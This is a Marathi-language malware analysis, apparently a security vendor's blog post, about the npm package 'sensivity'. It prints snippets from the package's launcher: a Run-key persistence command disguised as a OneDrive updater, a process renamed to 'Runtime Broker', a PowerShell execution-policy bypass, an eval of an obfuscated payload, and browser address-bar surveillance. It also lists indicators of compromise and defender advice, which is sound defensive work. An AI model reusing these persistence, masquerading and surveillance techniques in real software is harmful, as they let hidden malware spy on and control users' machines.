PairLoop: npm पॅकेजमधील छुपे रिमोट-कंट्रोल पॅनल

पेअरलूप: एक एनपीएम पॅकेज, सत्तर आवृत्त्या, आणि एक छुपे विंडोज रिमोट-कंट्रोल पॅनल

अनुक्रमणिका

अवश्य वाचा

नवीनतम मनोरंजक पोस्ट्स

TL; डॉ

एनपीएम पॅकेज संवेदनशीलता ते स्वतःला "सेन्सिटिव्हिटी कंट्रोल पॅनल" असे संबोधते. विंडोजवर ते रिमोट-कंट्रोल आणि पाळत ठेवण्याच्या साधनाप्रमाणे कार्य करते.

त्याचा प्रवेशद्वार, launcher.jsस्वतःच्या प्रक्रियेचे नाव बदलून रनटाइम ब्रोकर ठेवते, 'ऑटोस्टार्ट' नावाचे रन-की मूल्य लिहिते OneDriveUpdate जे एका छुप्या VBScript द्वारे पॅकेज पुन्हा सुरू करते, PowerShell सुरू करते -ExecutionPolicy Bypassआणि मग ६.८७ एमबीच्या नेटिव्ह मॉड्यूलसोबत १७१ केबीच्या ऑबफस्केटेड सर्व्हर पेलोडचे मूल्यांकन करते. sens.node.

ते TCP पोर्ट 3000 वर फोन-पेअरिंग कंट्रोल पॅनल पुरवते आणि विंडोज UIAutomation द्वारे सक्रिय ब्राउझरच्या ॲड्रेस-बारमधील URL वाचते, तसेच एका हार्ड-कोडेड YouTube व्हिडिओवर लक्ष ठेवते.

पूर्वी गूढ वाटणारे दोन भाग आता सुटले आहेत. अस्पष्ट केलेला सर्व्हर, server.obf.js, obfuscator.io RC4 स्ट्रिंग-ॲरे स्कीम वापरते; त्याचा डिकोडर ऑफलाइन (कोणतेही जावास्क्रिप्ट कार्यान्वित न करता) पुन्हा कार्यान्वित केल्यास एकच बाह्य एंडपॉइंट पुनर्प्राप्त होतो — https://izopi.com/check.php — स्वाक्षरी केलेल्या परवाना प्रतिसादांची पडताळणी करण्यासाठी वापरल्या जाणाऱ्या एम्बेडेड RSA सार्वजनिक की सोबत.

नेटिव्ह मॉड्यूल, sens.node, पॅक केलेले नाही: त्याचे इम्पोर्ट टेबल आणि एम्बेडेड स्ट्रिंग्ज ते DirectX 11 / Dear ImGui इन-गेम ओव्हरले म्हणून ओळखतात जे रिमोट-प्रोसेस इंजेक्शन आणि मेमरी रीड्स/राइट्सद्वारे चालवले जाणारे एमबॉट, ईएसपी (वॉल-हॅक), आणि ट्रिगरबॉट वैशिष्ट्ये प्रदान करते.

त्यातील स्ट्रिंग्ज GTA V / FiveM शी सुसंगत असलेल्या वाहनांच्या एंटिटीज आणि नकाशावरील स्थानांचा संदर्भ देतात. npm पॅकेज हे त्या नेटिव्ह मॉड्यूलभोवती असलेले डिलिव्हरी आणि पर्सिस्टन्स रॅपर आहे.

निर्णायक संकेत तांत्रिक नसून कार्यात्मक आहे: एकाच अज्ञात प्रकाशकाने एकाच पॅकेजच्या जवळपास सत्तर आवृत्त्या सादर केल्या — 2.5.0 द्वारे 2.5.69 — काही दिवसांच्या कालावधीत, प्रत्येकाने तेच लाँचर सोबत बाळगले होते.

कोणतेही इन्स्टॉल नाही hooksपेलोड फक्त पॅकेज सुरू झाल्यावरच चालतो.

हल्ला: तो कसा काम करतो

sensivity सोबत दहा फाइल्स येतात. package.json मध्ये फार काही माहिती नाही: रिपॉझिटरी फील्ड नाही, लायसन्स नाही, एक main आणि दोन bin एलियासेस (sensivity, sens) आहेत, जे सर्व launcher.js कडे निर्देशित करतात, आणि node launcher.js नावाची एक स्टार्ट स्क्रिप्ट आहे. यात postinstall किंवा preinstall नाही. npm install केल्यावर काहीही कार्यान्वित होत नाही. खाली वर्णन केलेले वर्तन तेव्हा चालते जेव्हा वापरकर्ता bin shim, स्टार्ट स्क्रिप्ट किंवा require द्वारे पॅकेज सुरू करतो.

टारबॉलमध्ये लाँचर, एक ऑबफस्केटेड सर्व्हर, नेटिव्ह मॉड्यूल, एक व्हिज्युअल बेसिक स्क्रिप्ट आणि कंट्रोल पॅनलसाठी एक public/web डिरेक्टरी असते. launcher.js हे वाचनीय ऑर्केस्ट्रेटर आहे; रनटाइमवर महत्त्वाचे असलेले लॉजिक ते लोड करत असलेल्या दोन ब्लॉब्समध्ये असते — एक ऑबफस्केटेड सर्व्हर आणि एक कंपाइल्ड नेटिव्ह मॉड्यूल, जे दोन्ही खाली रिझॉल्व्ह केले आहेत.

 प्रक्रिया छद्मवेष आणि एक बनावट OneDrive अपडेटर

अंमलबजावणीच्या सुरुवातीला launcher.js स्वतःच्या प्रक्रियेचे नाव दोनदा सेट करते:

   javascript process.title = 'Runtime Broker'; 

रनटाइम ब्रोकर ही एक वैध विंडोज प्रक्रिया (RuntimeBroker.exe) आहे जी अॅप परवानग्यांचे मध्यस्थी करते. नोड प्रक्रियेचे नाव बदलून तिच्याशी जुळवल्यास, टास्क मॅनेजरवर एक नजर टाकल्यास काहीही असामान्य दिसत नाही.

परसिस्टन्स थेट रजिस्ट्री API ऐवजी पॉवरशेलद्वारे लिहिले जाते:

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

ऑटोस्टार्ट व्हॅल्यूचे नाव OneDriveUpdate आहे, आणि ते थेट पॅकेजकडे निर्देशित करत नाही. ते बंडल केलेल्या OneDrive.Standalone.Updater.vbs चालवणाऱ्या wscript.exe कडे निर्देशित करते. ती स्क्रिप्ट एका छुप्या विंडोमध्ये node launcher.js पुन्हा सुरू करते. रन-कीचे नाव आणि VBScript फाईलचे नाव दोन्ही मायक्रोसॉफ्टच्या ब्रँडिंगमधून घेतलेले आहेत, त्यामुळे ऑटोस्टार्ट एन्ट्री एक नियमित OneDrive टास्क म्हणून वाचली जाते.

एक्झिक्युशन-पॉलिसी बायपाससह पॉवरशेल

लाँचर वारंवार पॉवरशेल उघडतो. स्कॅनर ज्याला गंभीर म्हणून चिन्हांकित करतात तो सिंक म्हणजे एक्झिक्युशन पॉलिसी अक्षम करून तयार केलेल्या .ps1 फाईलचे लाँच होय:

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

ExecutionPolicy Bypass त्या इन्व्होकेशनसाठी स्थानिक स्क्रिप्ट-साइनिंग तपासणी काढून टाकते. तयार केलेल्या स्क्रिप्ट्स पुढील विभागात वर्णन केलेले ब्राउझर-निरीक्षण आणि विंडो-शोधण्याचे काम हाताळतात.

अस्पष्ट सर्व्हर आणि नेटिव्ह मॉड्यूल

सेटअप झाल्यावर, launcher.js त्याचा खरा पेलोड लोड करून कार्यान्वित करतो:

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

server.obf.js ही १७१ KB ची _0x-ॲरे ऑबफस्केशन फाईल आहे — ही एक जावास्क्रिप्ट पद्धत आहे जिथे प्रत्येक स्ट्रिंग आणि आयडेंटिफायरला एका शफल केलेल्या ॲरेमधील इंडेक्सने बदलले जाते आणि नंतर रनटाइमवर डी-रेफरन्स केले जाते. ही योजना obfuscator.io द्वारे तयार केलेला RC4 प्रकार आहे: एकच डिकोडर फंक्शन ॲरेमधील एका एंट्रीला बेस64-डिकोड करते आणि नंतर प्रत्येक कॉलसाठी असलेल्या की (per-call key) वापरून त्याला RC4-डिक्रिप्ट करते. त्या डिकोडरला एका वेगळ्या स्क्रिप्टमध्ये पुन्हा तयार केल्यास — आणि पॅकेजची स्वतःची जावास्क्रिप्ट कधीही न चालवता, केवळ काढलेल्या ८२१-एंट्री स्ट्रिंग ॲरेवर ती पुनर्अंमलबजावणी चालवल्यास — ते व्यवस्थितपणे उलगडते. जे काही समोर येते ते मर्यादित असले तरी...cisयामध्ये एक बाह्य URL, `https://izopi.com/check.php`, जे LICENSE_URL कॉन्स्टंटला नियुक्त केलेले आहे; एक एम्बेडेड RSA `PUBLIC_KEY_PEM`; लोकल पॅनल रूट्स `/api/kill`, `/api/qr.png`, `/api/trigger`, `/api/url`, `/trigger/off`, आणि `/trigger/status`;` आणि `child_process`, `crypto`, व `[Sensivity] sens.node loaded` या स्ट्रिंग्ज आहेत — यातील शेवटची स्ट्रिंग ही तीच लॉग लाईन आहे जी लाँचर 'program module loaded' असे रिराइट करतो. हा एंडपॉइंट लायसन्स तपासणीचा आहे: क्लायंट एक आयडेंटिफायर पोस्ट करतो (ऑबफस्केटेड सर्व्हर 'Discord ID: %s' या स्ट्रिंगला फॉरमॅट करतो) आणि RSA की सर्व्हरच्या स्वाक्षरी केलेल्या प्रतिसादाची पडताळणी करते.

sens.node हे ६.८७ MB चे एक संकलित नेटिव्ह अॅडऑन आहे, आणि ते पॅक केलेले नाही — सेक्शन एन्ट्रॉपी ५.६–६.६ वर आहे आणि PE आयात व निर्यात सारण्या अबाधित आहेत, त्यामुळे त्याच्या क्षमता थेट वाचता येतात. ते napi_register_module_v1 निर्यात करते, standard नोड एन-एपीआय एन्ट्री पॉईंट, त्यामुळे इव्हॅल केलेला सर्व्हर ते एका साध्या 'रिक्वायर' कमांडने लोड करतो. त्याची इम्पोर्ट टेबल ही माहिती देते. KERNEL32 मधून ते OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, आणि Process32First/NextW घेते — हा दुसऱ्या प्रोसेसला शोधण्यासाठी, तिच्यामध्ये मेमरी ॲलोकेट करण्यासाठी, आणि ती मेमरी वाचण्यासाठी किंवा लिहिण्यासाठीचा प्रमाणित संच आहे. USER32 मधून ते GetAsyncKeyState, GetKeyState, mouse_event, आणि SetCursorPos घेते; ते ऑन-स्क्रीन ओव्हरलेसाठी d3d11.dll, D3DCOMPILER_43, आणि dwmapi, आणि नेटवर्क कॉल्ससाठी संपूर्ण WINHTTP संच लिंक करते. त्यातील एम्बेडेड स्ट्रिंग्स वैशिष्ट्यांच्या संचाची नावे निःसंदिग्धपणे देतात: एनेबल एमबॉट, एमबॉट एफओव्ही, बॉक्स ईएसपी, स्केलेटन ईएसपी, ट्रिगरबॉट, ईएसपी बिल्डर, व्हेईकल ईएसपी, इलेक्ट्रॉन अँटीचीट डिटेक्टेड, आणि डिअर इमगुई बॅनर डिअर इमगुई १.९१.३ डब्ल्यूआयपी. ग्रेपसीड मेडिकल क्लिनिक सारख्या लोकेशन आणि एंटिटी स्ट्रिंग्स आणि व्हेईकल-ईएसपी शब्दसंग्रह जीटीए व्ही / फाईव्हएम शी सुसंगत आहेत.

प्रत्यक्षात ही विभागणी हेतुपुरस्सर आहे: वाचण्यायोग्य launcher.js मध्ये फक्त तेच भाग असतात जे स्कॅनर सहजपणे वाचू शकतो — पर्सिस्टन्स, मॅस्क्वेरेड, आणि स्वतः eval कॉल — तर ऑबफस्केशन रनटाइम ज्या एका बाह्य होस्टशी संपर्क साधतो त्याला लपवते, आणि बायनरीमध्ये गेम-ओव्हरले व प्रोसेस-इंजेक्शन लॉजिक असते. लाँचर हे एक पातळ, तपासण्यायोग्य शेल आहे; ऑबफस्केटेड सर्व्हर नेटवर्कची ओळख लपवतो; आणि नेटिव्ह मॉड्यूल हा पेलोड आहे. आम्ही बायनरीचे इम्पोर्ट्स आणि स्ट्रिंग्ज वाचलेले आहेत असे वर्णन करतो; आम्ही त्यावरून ऑपरेटरच्या उद्देशाचा अंदाज लावत नाही.

 पोर्ट ३००० वरील फोन-पेअरिंग कंट्रोल पॅनल

लाँचर TCP पोर्ट 3000 वर एका स्थानिक वेब सर्व्हरचे व्यवस्थापन करतो आणि त्याला सिंगलटन म्हणून हाताळतो. तो अस्तित्वात असलेल्या लिसनरसाठी क्वेरी करतो आणि बाइंडिंग करण्यापूर्वी त्याला क्लिअर करतो:

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

हे पॅनल http://localhost:3000 वर उपलब्ध आहे, आणि त्यासाठी http://192.168.1.16:3000 हा एक हार्ड-कोडेड लॅन फॉलबॅक यूआरएल (URL) आहे. 'public/' डिरेक्टरी आणि पॅनलची कार्यपद्धती क्यूआर-पेअरिंग प्रक्रियेशी सुसंगत आहे: फोन एक कोड स्कॅन करतो आणि रिमोट म्हणून होस्टशी जोडला जातो. लाँचरमध्ये कोणतेही बाह्य कमांड-अँड-कंट्रोल डोमेन स्पष्ट मजकुरात (cleartext) दिसत नाही — परंतु, वर दिलेल्या डीऑबफस्केशनमध्ये दाखवल्याप्रमाणे, ऑबफस्केटेड सर्व्हरमध्ये एक डोमेन उपस्थित आहे: izopi.com लायसन्स एंडपॉइंट. पॅनल स्वतः स्थानिक (local) आणि लॅन-स्कोप केलेले आहे; एकमेव आउटबाउंड होस्ट म्हणजे ती लायसन्स तपासणी आहे.

एक स्वतंत्र सुपरवायझर/वर्कर मॉडेल प्रोसेसला जिवंत ठेवते. लाँचर SENSIVITY_SUPERVISOR आणि SENSIVITY_WORKER या एन्व्हायर्नमेंट फ्लॅग्जसह स्वतःला पुन्हा सुरू करतो, ज्यात प्रत्येक चाइल्ड प्रोसेस लपून चालते, त्यामुळे एक प्रोसेस बंद केल्यावर तिला पुन्हा सुरू करण्यासाठी एक वॉचडॉग शिल्लक राहतो.

ब्राउझर पाळत आणि यूट्यूब सिग्नल

सर्वात विशिष्ट वर्तन म्हणजे ब्राउझर मॉनिटरिंग. launcher.js एक पॉवरशेल तयार करते जे चालू असलेल्या ब्राउझरचा ॲड्रेस बार वाचण्यासाठी विंडोज UIAutomation ला चालना देते:

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

व्हॅल्यूपॅटर्न (ValuePattern) एका UI घटकाची मजकूर सामग्री परत करते. ब्राउझरच्या ॲड्रेस-बार एडिट कंट्रोलवर लागू केल्यावर, ते ब्राउझर एक्सटेंशनशिवाय, डिस्कवरील प्रोफाइलला स्पर्श न करता आणि API हुकशिवाय, वापरकर्ता सध्या पाहत असलेला URL परत करते. तयार केलेली स्क्रिप्ट $browserNames सूचीवर प्रक्रिया करते आणि जो ब्राउझर अग्रभागी (foreground) आहे त्याचा URL किंवा विंडो शीर्षक काढते.

त्या URL ची चाचणी एकाच हार्ड-कोडेड लक्ष्याविरुद्ध केली जाते:

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

लाँचर यूट्यूब दाखवणाऱ्या ब्राउझर विंडोसाठी तीन-सेकंदांच्या लूपमध्ये तपासणी करतो, आणि तयार केलेल्या पॉवरशेलमध्ये Get-YouTubeBrowser / Test-TargetYouTubeUrl ही जोडी असते जी त्या व्हिडिओ आयडीशी जुळते. याचा दिसणारा परिणाम दुहेरी आहे: पीडिताच्या स्क्रीनवरून सक्रिय ब्राउझिंग URL वाचली जाते, आणि होस्टने एका विशिष्ट यूट्यूब व्हिडिओसोबत केलेला संवाद ओळखला जातो. आम्ही कार्यप्रणाली आणि लक्ष्याचे वर्णन करतो; आम्ही त्यावरून हेतूचा निष्कर्ष काढत नाही.

अॅड्रेस-बारमधून वाचलेल्या माहितीला स्कॅनर 'sensitive_data_enumeration' असे लेबल देतो — म्हणजेच, नेटवर्क-सक्षम रनटाइमला डेटा पुरवणारा एक Process::env आणि UIAutomation सोर्स. स्वतंत्रपणे पाहिल्यास ही प्रक्रिया निरुपद्रवी वाटते आणि UIAutomation सोर्सपासून ते अस्पष्ट केलेल्या सर्व्हरपर्यंत डेटाच्या जीवनचक्राचा मागोवा घेतला गेल्यावरच ती एक पाळत ठेवण्याची प्रक्रिया असल्याचे स्पष्ट होते.

कालक्रम आणि आवृत्ती उत्क्रांती

सेन्सिटिव्हिटी हे एकाच वेळी अपलोड करण्याचे काम नाही. प्रकाशकाच्या खात्यावर या एकाच पॅकेजच्या अंदाजे सत्तर प्रकाशित आवृत्त्या आहेत आणि पुनरावलोकनाच्या कालावधीत नवीन आवृत्त्या येतच राहिल्या. २.५.x मालिकेमध्ये लाँचरचे वैशिष्ट्य हळूहळू विकसित होत जाते, तर त्याचे पर्सिस्टन्स आणि पेलोड-लोडिंग स्थिर राहते.

तारीख (UTC) निरीक्षण केलेल्या आवृत्त्या लाँचर स्थिती
2026-06-02 2.5.8 - 2.5.46 (25) मूळ क्यूआर-पॅनल लाँचर; रन-की सातत्य; ऑबफस्केटेड सर्व्हरचे मूल्यांकन.
2026-06-03 2.5.53 - 2.5.61 (6) समान फिंगरप्रिंट; कन्सोल-ट्रेस दमन.
2026-06-04 2.5.67, 2.5.68 (2) पिन केलेले YouTube एंगेजमेंट लक्ष्य जोडते wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24) त्रुटी भरून काढण्यासाठी संपूर्ण श्रेणीमध्ये पुनर्प्रकाशन; पर्यवेक्षक/कामगार निगराणी संस्था.

डाउनलोड केलेल्या आवृत्त्यांमधील — २.५.०, २.५.३६, आणि २.५.६९ — लाँचरचे विश्लेषण केल्यास चार स्तर दिसून येतात. सर्वात सुरुवातीच्या बिल्ड्समध्ये मूळ QR-पेअरिंग लाँचर आहे. २.५.३३ पासून UIAutomation ॲड्रेस-बार हार्वेस्टर दिसतो. २.५.५८ पासून एक सुपरवायझर-मॅनेजमेंट लेयर जोडला जातो. २.५.६४ पासून स्वतंत्र सुपरवायझर/वर्कर वॉचडॉग हा संच पूर्ण करतो. या संपूर्ण प्रक्रियेत, चार गोष्टी कधीही बदलत नाहीत: OneDriveUpdate रन की, OneDrive.Standalone.Updater.vbs ड्रॉपर, eval'd server.obf.js, आणि sens.node नेटिव्ह मॉड्यूल.

२०२६-०६-०५ ची लाट लक्षणीय आहे कारण तिने काही दिवसांपूर्वी पुष्टी केलेल्या आवृत्त्यांपेक्षा कमी असलेले आवृत्ती क्रमांक — २.५.० ते २.५.१५ — पुन्हा प्रकाशित केले. याचा परिणाम म्हणजे रजिस्ट्रीवर २.५.x ची एक सलग ओळ तयार झाली आहे, ज्यात प्रत्येक आवृत्तीमध्ये तोच लाँचर आहे.

तडजोडीचे संकेतक

खालील सर्व निर्देशक थेट पॅकेज टारबॉलमधून वाचले गेले. वाचता येण्याजोग्या लाँचरमध्ये फक्त लूपबॅक आणि एकच खाजगी लॅन पत्ता आहे; एकमेव बाह्य होस्टनेम, izopi.com, server.obf.js ला ऑफलाइन डीऑबफस्केट करून परत मिळवण्यात आले.

प्रकार दर्शक टिपा
पॅकेज npm:sensivity (≈७० आवृत्त्या, 2.5.0-2.5.69) एकल-पॅकेज प्रकाशक; रेपॉजिटरी नाही; परवाना नसलेला.
फाइल launcher.js वाचनीय ऑर्केस्ट्रेटर; मुख्य आणि बिन टार्गेट.
फाइल server.obf.js (≈१७१ केबी) obfuscator.io RC4 स्ट्रिंग-ॲरे पेलोड, याच्याद्वारे लोड केले आहे eval(fs.readFileSync(...)).
फाइल sens.node (≈6.87 MB) PE32+ x86-64 नोड एन-एपीआय अॅडऑन; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
फाइल OneDrive.Standalone.Updater.vbs लपवलेला रीलाँचर (node launcher.js).
नेटवर्क https://izopi.com/check.php अस्पष्ट केलेल्या सर्व्हरवरून परवाना/प्रमाणीकरण एंडपॉइंट पुनर्प्राप्त केला; अंतर्भूत RSA सार्वजनिक की प्रतिसादांची पडताळणी करते.
क्षमता OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread रिमोट-प्रोसेस इंजेक्शन आणि मेमरी रीड/राइट क्षमता.
क्षमता Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP एमबॉट, ईएसपी आणि ट्रिगरबॉट वैशिष्ट्ये लागू करणारा DirectX 11 / ImGui गेम ओव्हरले.
नोंदणी HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate ऑटोस्टार्ट मूल्य याकडे निर्देशित करत आहे wscript.exe आणि व्हीबीस्क्रिप्ट लाँचर.
प्रक्रिया process.title = 'Runtime Broker' अधिकृत विंडोज रनटाइम ब्रोकर प्रक्रियेचे सोंग घेते.
वर्तणूक powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 तयार केलेल्या पॉवरशेल स्क्रिप्ट्ससाठी एक्झिक्युशन-पॉलिसी बायपासचा वापर केला जातो.
वर्तणूक UIAutomation ValuePattern ब्राउझरच्या ॲड्रेस बारचे वाचन समोरच्या ब्राउझर विंडोचा URL वाचतो.
वर्तणूक लक्ष्य व्हिडिओ आयडी wJWta2lO0Lw३-सेकंदांचे यूट्यूब मतदान पिन केलेला एंगेजमेंट-मॉनिटरिंग सिग्नल.
नेटवर्क http://localhost:3000फॉलबॅक http://192.168.1.16:3000 स्थानिक पातळीवर आणि LAN वर QR-पेअरिंग कंट्रोल पॅनल उपलब्ध आहे.
पर्यावरण SENSIVITY_SUPERVISOR, SENSIVITY_WORKER अलिप्त वॉचडॉग प्रक्रिया समन्वय ध्वज.

श्रेय, परिणाम आणि समर्थक

हे पॅकेज एकाच npm खात्याद्वारे प्रकाशित केले आहे, ज्याचा नमूद केलेला ईमेल एक अप्रमाणित Gmail पत्ता आहे. या खात्याचा रजिस्ट्री प्रतिष्ठा स्कोअर अत्यंत नकारात्मक आहे, ते फक्त हे एकच पॅकेज सांभाळते व प्रकाशित करते आणि त्याला कोणतेही जोडलेले सोर्स रिपॉझिटरी नाही. आम्ही ईमेलच्या मालकीची पडताळणी केलेली नाही आणि आम्ही या मोहिमेचे श्रेय प्रकाशक खात्याला देतो, कोणत्याही नावाच्या व्यक्तीला नाही. लाँचरमध्ये कोणतीही क्लिअरटेक्स्ट पायाभूत सुविधा नाही, परंतु एक बाह्य होस्ट आता ज्ञात आहे: ऑबफस्केटेड सर्व्हर परवाना तपासणीसाठी izopi.com शी संपर्क साधतो, आणि नेटिव्ह मॉड्यूल — जे उलट्या क्रमाने सूचना-दर-सूचना वाचण्याऐवजी त्याच्या इम्पोर्ट टेबल आणि स्ट्रिंगमधून वाचले जाते — हे एक गेम ओव्हरले आहे जे दुसऱ्या प्रोसेसच्या मेमरीमध्ये इंजेक्ट करून ती वाचते.

याचा दृश्य परिणाम अशा विंडोज वापरकर्त्यांवर होतो जे कंट्रोल-पॅनल युटिलिटीच्या अपेक्षेने हे पॅकेज इन्स्टॉल आणि रन करतात. अशा होस्ट्सवर, हे पॅकेज OneDrive टास्कच्या रूपात एक ऑटोस्टार्ट पर्सिस्टन्स स्थापित करते, सिस्टम प्रोसेसची नक्कल करण्यासाठी स्वतःचे नाव बदलते, वापरकर्ता जे काही ब्राउझ करत आहे त्याचा URL वाचते, आणि एक पेअरिंग पॅनल उभे करते जे लोकल नेटवर्कवरून मशीनला रिमोटशी जोडते. सुपरवायझर/वर्कर वॉचडॉगमुळे एकदा प्रोसेस किल केल्याने ते काढून टाकले जात नाही; रन-की एन्ट्री रीबूटनंतरही टिकून राहते. या लाँचरमध्ये macOS आणि Linux साठी लक्ष्य ठेवलेले नाही — पर्सिस्टन्स, पॉवरशेल आणि UIAutomation हे पाथ फक्त विंडोजसाठीच आहेत.

सत्तर आवृत्त्यांमधील हा बदल लक्ष वेधण्यासारखा आहे. काही दिवसांतच एकच पॅकेज अनेक वेळा पुन्हा प्रकाशित केल्याने, ज्यात आधीच काढून टाकलेल्या आवृत्ती क्रमांकांपेक्षा खालचे क्रमांक पुन्हा समाविष्ट करणेही समाविष्ट आहे, प्रत्येक वेळी पॅकेज काढून टाकण्याच्या प्रक्रियेदरम्यान रजिस्ट्रीवर त्याची एक जिवंत प्रत राहते आणि आवृत्तीनुसार निश्चित केलेल्या ब्लॉकलिस्टला अडथळा निर्माण होतो. sensivity@2.5.61 साठीची ब्लॉकलिस्टमधील नोंद, दुसऱ्या दिवशी पुन्हा प्रकाशित झालेल्या sensivity@2.5.3 च्या विरोधात काहीही करत नाही.

बचावकर्ते खालील बाबींवर कारवाई करू शकतात:

  • रजिस्ट्री-प्रॉक्सी आणि सीआय अलाउलिस्टमध्ये पॅकेज नावाच्या संवेदनशीलतेला पूर्णपणे अवरोधित करा. वैयक्तिक आवृत्त्या निश्चित करणे हे पुनर्प्रकाशनाच्या गतीपुढे फिके पडते; नाव हेच एक टिकाऊ सूचक आहे.
  • OneDriveUpdate नावाच्या रन व्हॅल्यूचा शोध घ्या, ज्याचा डेटा प्रत्येक वापरकर्त्याच्या पाथमधील .vbs फाईलवर wscript.exe कार्यान्वित करतो. खरा OneDrive अपडेटर या पद्धतीने नोंदणीकृत नसतो.
  • 'Runtime Broker' हे process.title असलेल्या Node.js प्रक्रियेवर सूचना. खरा ब्रोकर RuntimeBroker.exe आहे, Node रनटाइम नाही.
  • ज्या पॅकेजेसमध्ये एक संकलित .node ॲडऑन आणि सोबतच त्याच्या शेजारील .obf.js फाईलचे eval(fs.readFileSync(…)) असते, अशा पॅकेजेसच्या npm install-time fetches ला फ्लॅग करा. ही जोडी — म्हणजेच, अस्पष्ट मजकूर पेलोडच्या शेजारी लोड केलेली अपारदर्शक नेटिव्ह बायनरी — ही येथील संरचनात्मक ओळख आहे, जी कोणत्याही स्ट्रिंग IOC पासून स्वतंत्र आहे.
  • व्यवस्थापित विंडोज एंडपॉइंट्सवर, अनपेक्षित नोड प्रक्रियेमुळे पोर्ट 3000 वर तयार झालेल्या कोणत्याही स्थानिकरित्या जोडलेल्या लिसनरला संशयास्पद माना.
  • डेव्हलपर किंवा अंतिम-वापरकर्ता होस्टकडून izopi.com कडे जाणाऱ्या आउटबाउंड विनंत्या ब्लॉक करा किंवा अलर्ट द्या; हा पॅकेजचा एकमेव बाह्य एंडपॉइंट आहे, जो ऑबफस्केटेड सर्व्हरवरून /check.php वर पोहोचतो.
  • कोणत्याही बंडल केलेल्या .node ॲडऑनवर विश्वास ठेवण्यापूर्वी, त्याच्या इम्पोर्ट टेबलची तपासणी करा. पॅकेज काय करण्याचा दावा करत असले तरी, OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread हे संयोजन रिमोट-प्रोसेस इंजेक्शन आहे; येथे ते Direct3D ओव्हरले आणि aimbot/ESP/triggerbot स्ट्रिंग्जच्या शेजारी आहे.

स्थिर-विश्लेषणासाठी pipelineत्यामुळे, आवृत्ती बदलानंतरही विश्वासाचे स्वरूप टिकून राहते: एक नॉन-नेटवर्क इन्स्टॉल प्रोफाइल, ज्ञात सिस्टम-प्रोसेस नावाला प्रोसेस-टायटल देणे, पॉवरशेलद्वारे रन-की वापरून लिहिणे, आणि डिस्कवरून वाचलेल्या फाईलचे मूल्यांकन करणे. यापैकी काहीही डोमेन, आयपी किंवा आवृत्ती क्रमांकावर अवलंबून नाही, जे पुढील पुनर्प्रकाशनात बदलले जाऊ शकते.

 संदर्भ

[एनपीएम: संवेदनशीलता] – येथे चर्चा केलेल्या पॅकेज आवृत्ती ओळीसाठीचे रजिस्ट्री पृष्ठ; काढून टाकले जाऊ शकते.

sca-tools-software-composition-analysis-tools
तुमच्या सॉफ्टवेअरमधील धोक्यांना प्राधान्य द्या, त्यांचे निवारण करा आणि त्यांना सुरक्षित करा.
आपले मोफत खाते मिळवा.
क्रेडिट कार्ड आवश्यक नाही.

तुमचा सॉफ्टवेअर विकास आणि वितरण सुरक्षित करा

झायगेनी प्रोडक्ट सूटसह